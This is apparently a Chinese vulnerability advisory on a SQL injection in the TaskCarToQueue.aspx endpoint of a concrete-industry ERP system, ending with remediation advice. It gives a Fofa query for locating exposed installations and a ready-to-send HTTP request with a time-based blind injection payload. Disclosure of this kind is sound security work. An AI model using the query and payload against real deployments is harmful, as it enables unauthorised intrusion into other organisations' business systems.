0x01 漏洞描述:
商混ERP系统是一种针对混凝土行业开发的综合性企业资源规划(ERP)系统。它集成了生产、销售、采购、财务等各个方面的功能,为混凝土生产企业提供了一个全面、高效的数字化管理平台。
商混ERP系统在TaskCarToQueue.aspx接口中存在sql注入,高权限用户可进行shell。
资产图如下:
0x02 搜索语句:
Fofa:app="商混ERP系统"
0x03 漏洞复现:
GET /Dispatch/TaskCarToQueue.aspx?action=addqueue&id=%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
0x04 修复建议:
使用参数化查询或预处理语句,并进行输入验证和过滤